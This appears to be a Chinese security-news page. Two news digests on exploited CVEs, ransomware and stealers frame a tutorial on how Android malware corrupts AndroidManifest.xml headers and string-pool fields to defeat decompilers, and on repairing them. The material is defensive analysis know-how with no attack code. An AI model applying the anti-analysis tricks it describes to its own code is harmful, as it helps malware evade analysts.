1、CISA披露SharePoint存在的安全漏洞已被积极利用 https://www.cisa.gov/news-events/alerts/2024/01/10/cisa-adds-one-known-exploited-vulnerability-catalog 美国网络安全和基础设施安全局 (CISA) 已将影响 Microsoft SharePoint Server 的严重安全漏洞添加到其已知被利用的漏洞 ( KEV )目录中，并引用了主动利用的证据。该问题编号为CVE-2023-29357（CVSS 评分：9.8），是一个权限升级缺陷，攻击者可利用该缺陷获取管理员权限。作为 2023 年 6 月补丁星期二更新的一部分，微软发布了针对该错误的补 2、Medusa勒索软件攻击活动呈上升趋势 https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/ 自 2023 年 2 月在暗网上首次出现专门的数据泄露网站以来，与Medusa 勒索软件相关的威胁行为者加大了活动力度，以发布不愿同意其要求的受害者的敏感数据。作为多重勒索策略的一部分，当受害者的数据发布在泄露网站上时，该组织将为受害者提供多种选择，例如延长时间、删除数据或下载所有数据。所有这些选项都有一个价格标签，具体取决于受该群体影响的组织。Medusa（不要与 Medusa Locker 混淆）是指 2022 年底出现、并于 2 3、Apache Hadoop和Flink中的错误配置可能遭受挖矿攻击 https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker 网络安全研究人员发现了一种新的攻击，该攻击利用 Apache Hadoop 和 Flink 中的错误配置在目标环境中部署加密货币矿工。由于攻击者使用加壳程序和 Rootkit 来隐藏恶意软件，因此这次攻击特别令人感兴趣。该恶意软件会删除特定目录的内容并修改系统配置以逃避检测。针对 Hadoop 的感染链利用了 YARN（又一个资源协商器）ResourceManager中的错误配置，该资源管理器负责跟踪集群中的资源并调度 4、GitLab 修补高危任意用户密码重置漏洞 https://www.securityweek.com/gitlab-patches-critical-password-reset-vulnerability/ GitLab 解决了一个严重的身份验证漏洞，该漏洞允许攻击者劫持密码重置电子邮件。 5、信息窃取程序利用 Windows SmartScreen 绕过漏洞 https://www.securityweek.com/information-stealer-exploits-windows-smartscreen-bypass/ 据网络安全公司趋势科技报告，Windows SmartScreen 中的一个最新漏洞在导致 Phemedrone Stealer 感染的攻击中被积极利用。 6、超过 178,000 个SonicWall 防火墙 (NGFW) 可能遭受黑客攻击 https://securityaffairs.com/157524/hacking/vulnerable-sonicwall-ngfw-exposed-online.html SonicWall 下一代防火墙 (NGFW) 系列 6 和 7 设备受到两个未经身份验证的拒绝服务漏洞的影响，分别为CVE-2022-22274 和 CVE-2023-0656，这可能会导致远程代码执行。专家发现，76%（233,984 个中的 178,637 个）面向互联网的防火墙容易受到一个或两个问题的影响。 7、Meta承认使用盗版书籍来训练 AI，并拒绝赔偿作家 https://www.freebuf.com/news/389695.html 近日，Meta（前身为 Facebook）就因使用包含大量盗版书籍的“Books3”数据集训练其 LLAM 1 和 LLAM 2 模型而面临包括喜剧演员 Sarah Silverman 和作家 Richard Kadrey 在内的一众作者的集体诉讼。Meta 虽承认使用了 Books3 数据集，却拒绝向作者支付适当的补偿。 8、Balada Injector 活动感染了 7100多个WordPress 网站 https://thehackernews.com/2024/01/balada-injector-infects-over-7100.html 数千个使用 Popup Builder 插件易受攻击版本的 WordPress 网站已受到名为Balada Injector的恶意软件的攻击。 9、Opera MyFlaw漏洞可运行 Mac 或 Windows 上的任何文件 https://thehackernews.com/2024/01/opera-myflaw-bug-could-let-hackers-run.html 网络安全研究人员披露了 Microsoft Windows 和 Apple macOS 的 Opera Web 浏览器中的一个安全漏洞，该漏洞可被利用来执行底层操作系统上的任何文件。 10、上市公司海普瑞遭遇电信诈骗，损失逾9000万元 https://www.secrss.com/articles/62766 海普瑞(002399.SZ)1月14日晚间公告，全资子公司Techdow Pharma Italy S.R.L.（简称“天道意大利”）近期遭遇犯罪团伙电信诈骗，涉案金额约1170余万欧元（约合9100万人民币）。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 恶意软件为了不让我们很容易反编译一个apk，会对androidmanifest文件进行魔改加固，本文探索androidmanifest加固的常见手法以及对抗方法。这里提供一个恶意样本的androidmanifest.xml文件，我们学完之后可以动手实践。 1、Androidmanifest文件组成 这里贴一张经典图，主要描述了androidmanifest的组成 androidmanifest文件头部仅仅占了8个字节，紧跟其后的是StringPoolType字符串常量池 （为了方便我们观察分析，可以先安装一下010editor的模板，详细见2、010editor模板） Magic Number 这个值作为头部，是经常会被魔改的，需要重点关注 StylesStart 该值一般为0，也是经常会发现魔改 StringPool 寻找一个字符串，如何计算？ 1、获得字符串存放开放位置：0xac（172），此时的0xac是不带开头的8个字节 所以需要我们加上8，最终字符串在文件中的开始位置是：0xb4 2、获取第一个字符串的偏移，可以看到，偏移为0 3、计算字符串最终存储的地方： 0xb4 = 0xb4 + 0 读取字符串，以字节00结束 读取到的字符为：theme 总结： stringpool是紧跟在文件头后面的一块区域，用于存储文件所有用到的字符串 这个地方呢，也是经常发生魔改加固的，比如：将StringCount修改为0xFFFFFF无穷大 在经过我们的手动计算和分析后，我们对该区域有了更深的了解。 2、010editor模板 使用010editor工具打开，安装模板库 搜索：androidmanifest.bt 安装完成且运行之后： 会发现完整的结构，帮助我们分析 3、使用AXMLPrinter2进行的排错和修复 用法十分简单： java -jar AXMLPrinter2.jar AndroidManifest_origin.xml 会有一系列的报错，但是不要慌张，根据这些报错来对原androidmanifest.xml进行修复 意思是：出乎意料的0x80003（正常读取的数据），此时却读取到：0x80000 按照小端序，正常的数据应该是： 03 00 08 使用 010editor 打开 将其修复 保存，再次尝试运行AXMLPrinter2 好家伙还有错误，这个-71304363，不方便我们分析，将其转换为python的hex数据 NegativeArraySizeException 表示在创建数组的时候，数组的大小出现了负数。 androidmanifest加固后文件与正常的androidmanifest文件对比之后就可以发现魔改的地方。 将其修改回去 运行仍然报错，是个新错误： 再次去分析： stringoffsets如此离谱，并且数组的大小变为了0xff 根据报错的信息，尝试把FF修改为24 再次运行 成功拿到反编译后的androidmanifest.xml文件 总结： 这个例子有三个魔改点经常出现在androidmanifest.xml加固 恶意软件通过修改这些魔改点来对抗反编译

1、研究人员披露Apache OfBiz ERP系统中漏洞的利用方法 https://vulncheck.com/blog/ofbiz-cve-2023-51467 网络安全研究人员开发了一种概念验证 (PoC) 代码，该代码利用Apache OfBiz 开源企业资源规划 (ERP) 系统中最近披露的一个关键缺陷来执行内存驻留有效负载。该漏洞为CVE-2023-51467（CVSS 评分：9.8），它绕过了同一软件中的另一个严重缺陷（CVE-2023-49070，CVSS 评分：9.8），可被武器化以绕过身份验证并远程执行任意命令代码。虽然该问题已在上个月发布的Apache OFbiz 版本 18.12.11中得到修复，但据观察，威胁行为者试图利用该缺陷，针对 2、攻击者恶意滥用GitHub资源的行为呈现上升趋势 https://www.recordedfuture.com/flying-under-the-radar-abusing-gitHub-malicious-infrastructure GitHub 在信息技术 (IT) 环境中的普遍存在，使其成为威胁行为者托管和传递恶意负载并充当死点解析器、命令和控制以及数据渗漏点的有利可图的选择。将 GitHub 服务用于恶意基础设施可以让对手融入合法的网络流量，通常会绕过传统的安全防御，并使上游基础设施跟踪和攻击者归因变得更加困难。网络安全公司将这种方法描述为“离地受信任站点”(LOTS)，这是威胁行为者经常采用的离地生活 (LotL) 技术的延伸， 3、Adobe修复Substance 3D Stager产品中的代码执行漏洞 https://www.securityweek.com/adobe-patches-code-execution-flaws-in-substance-3d-stager/ 软件制造商 Adobe 发布了针对 Substance 3D Stager 产品中六个安全缺陷的补丁，并警告称，黑客可以针对这些漏洞发起代码执行攻击。Adobe 将这些漏洞标记为“重要严重性”等级，并敦促 macOS 和 Windows 平台上的用户立即应用更新。在 2004 年的第一个周二补丁更新中，Adobe记录了面向企业的 3D 渲染软件中至少有 6 个漏洞，并表示成功利用可能会导致内存泄漏和在当前用户的上下文中 4、开源密码管理器Bitwarden添加密钥支持以登录Web密码库 https://www.bleepingcomputer.com/news/security/bitwarden-adds-passkey-support-to-log-into-web-password-vaults/ 开源 Bitwarden 密码管理器宣布所有用户现在都可以使用密钥而不是标准用户名和密码对登录其网络保管库。密钥是大多数人设置的密码的更安全的替代方案，并且可以抵御网络钓鱼。就 Bitwarden 而言，他们允许用户解密其保管库，而无需主密码、电子邮件地址或双因素身份验证 (2FA)。Bitwarden 的密钥实现目前处于测试阶段，依赖 PRF WebAuthn 扩展来验证 5、Akira勒索软件可擦除NAS和磁带备份设备的数据 https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/suomalaiset-organisaatiot-akira-kiristyshaittaohjelmien-kohteena 芬兰国家网络安全中心 (NCSC-FI) 通报 Akira 勒索软件活动在 12 月份有所增加，该活动针对该国的公司并擦除备份。该机构表示，上个月报告的 7 起勒索软件事件中，有 6 起是由威胁行为者发起的。擦除备份会放大攻击的损害，并允许威胁行为者向受害者施加更大的压力，因为他们消除了无需支付赎金即可恢复数据的选项。小型组织经常使用网络附加存储 (NA 6、超过15万个WordPress网站因易受攻击的插件可能遭受攻击 https://www.wordfence.com/blog/2024/01/type-juggling-leads-to-two-vulnerabilities-in-post-smtp-mailer-wordpress-plugin/ 影响 POST SMTP Mailer WordPress 插件（300000 个网站使用的电子邮件传送工具）的两个漏洞可能会帮助攻击者完全控制站点身份验证。上个月，研究人员发现了该插件中的两个漏洞，并将其报告给供应商。第一个被追踪为CVE-2023-6875，是一个严重的授权绕过缺陷，由 connect-app REST 端点上的“类型杂耍”问题引起。该 7、Atomic窃取器通过加密载荷针对Mac用户发起攻击 https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version 网络安全研究人员发现了名为Atomic（或 AMOS）的 macOS 信息窃取程序的更新版本，这表明该恶意软件背后的威胁行为者正在积极增强其功能。Atomic Stealer 似乎在 2023 年 12 月中下旬左右进行了更新，其开发人员引入了有效负载加密，以绕过检测规则。Atomic Stealer首次出现于 2023 年 4 月，每月订阅费为 1000 8、新型 CI/CD 攻击可能导致 PyTorch 供应链受损 https://www.securityweek.com/new-class-of-ci-cd-attacks-could-have-led-to-pytorch-supply-chain-compromise/ Praetorian 安全研究员 John Stawinski 表示，新披露的一类 CI/CD 攻击可能允许攻击者将恶意代码注入 PyTorch 存储库，从而导致大规模供应链受损。 9、苹果修复妙控键盘中的击键注入漏洞 https://www.securityweek.com/apple-patches-keystroke-injection-vulnerability-in-magic-keyboard/ 苹果本周宣布了妙控键盘固件更新，修复了一个可能允许攻击者通过蓝牙注入击键的漏洞。 10、Juniper SRX 防火墙和 EX 交换机中发现严重 RCE 漏洞 https://thehackernews.com/2024/01/critical-rce-vulnerability-uncovered-in.html Juniper Networks 已发布更新以修复其 SRX 系列防火墙和 EX 系列交换机中的关键远程代码执行 (RCE) 漏洞。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。